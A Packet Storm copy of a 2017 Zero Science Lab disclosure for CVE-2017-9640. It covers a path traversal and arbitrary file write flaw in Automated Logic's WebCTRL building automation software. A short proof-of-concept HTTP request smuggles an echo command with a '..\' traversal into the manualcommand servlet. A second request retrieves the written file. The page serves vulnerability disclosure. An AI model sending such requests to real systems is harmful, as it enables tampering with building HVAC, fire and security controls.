what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Automated Logic WebCTRL 6.1 Path Traversal Arbitrary File Write

Automated Logic WebCTRL 6.1 Path Traversal Arbitrary File Write
Posted Aug 23, 2017
Authored by LiquidWorm | Site zeroscience.mk

Automated Logic WebCTRL version 6.1 suffers from path traversal and arbitrary file write vulnerabilities.

tags | exploit, arbitrary, vulnerability
advisories | CVE-2017-9640
SHA-256 | d3b951db8409e19b78475f9fb44d79c63325ddae62a4de844e546024fb5b2b8c

Automated Logic WebCTRL 6.1 Path Traversal Arbitrary File Write

Change Mirror Download

Automated Logic WebCTRL 6.1 Path Traversal Arbitrary File Write


Vendor: Automated Logic Corporation
Product web page: http://www.automatedlogic.com
Affected version: ALC WebCTRL, SiteScan Web 6.1 and prior
ALC WebCTRL, i-Vu 6.0 and prior
ALC WebCTRL, i-Vu, SiteScan Web 5.5 and prior
ALC WebCTRL, i-Vu, SiteScan Web 5.2 and prior

Summary: WebCTRLA(r), Automated Logic's web-based building automation
system, is known for its intuitive user interface and powerful integration
capabilities. It allows building operators to optimize and manage
all of their building systems - including HVAC, lighting, fire, elevators,
and security - all within a single HVAC controls platform. It's everything
they need to keep occupants comfortable, manage energy conservation measures,
identify key operational problems, and validate the results.

Desc: The vulnerability is triggered by an authenticated user that can use
the manualcommand console in the management panel of the affected application.
The ManualCommand() function in ManualCommand.js allows users to perform additional
diagnostics and settings overview by using pre-defined set of commands. This
can be exploited by using the echo command to write and/or overwrite arbitrary
files on the system including directory traversal throughout the system.

Tested on: Microsoft Windows 7 Professional (6.1.7601 Service Pack 1 Build 7601)
Apache-Coyote/1.1
Apache Tomcat/7.0.42
CJServer/1.1
Java/1.7.0_25-b17
Java HotSpot Server VM 23.25-b01
Ant 1.7.0
Axis 1.4
Trove 2.0.2
Xalan Java 2.4.1
Xerces-J 2.6.1


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience


Advisory ID: ZSL-2017-5430
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5430.php

CVE ID: CVE-2017-9640
CVE URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9640


30.01.2017

--


PoC:

GET /_common/servlet/lvl5/manualcommand?wbs=251&action=echo%20peend>..\touch.txt&id=7331 HTTP/1.1
Host: TARGET

---

GET http://TARGET/touch.txt HTTP/1.1

peend
Login or Register to add favorites

File Archive:

November 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    16 Files
  • 2
    Nov 2nd
    17 Files
  • 3
    Nov 3rd
    17 Files
  • 4
    Nov 4th
    11 Files
  • 5
    Nov 5th
    0 Files
  • 6
    Nov 6th
    0 Files
  • 7
    Nov 7th
    3 Files
  • 8
    Nov 8th
    59 Files
  • 9
    Nov 9th
    12 Files
  • 10
    Nov 10th
    6 Files
  • 11
    Nov 11th
    11 Files
  • 12
    Nov 12th
    1 Files
  • 13
    Nov 13th
    0 Files
  • 14
    Nov 14th
    9 Files
  • 15
    Nov 15th
    33 Files
  • 16
    Nov 16th
    53 Files
  • 17
    Nov 17th
    11 Files
  • 18
    Nov 18th
    14 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    26 Files
  • 22
    Nov 22nd
    22 Files
  • 23
    Nov 23rd
    10 Files
  • 24
    Nov 24th
    9 Files
  • 25
    Nov 25th
    11 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close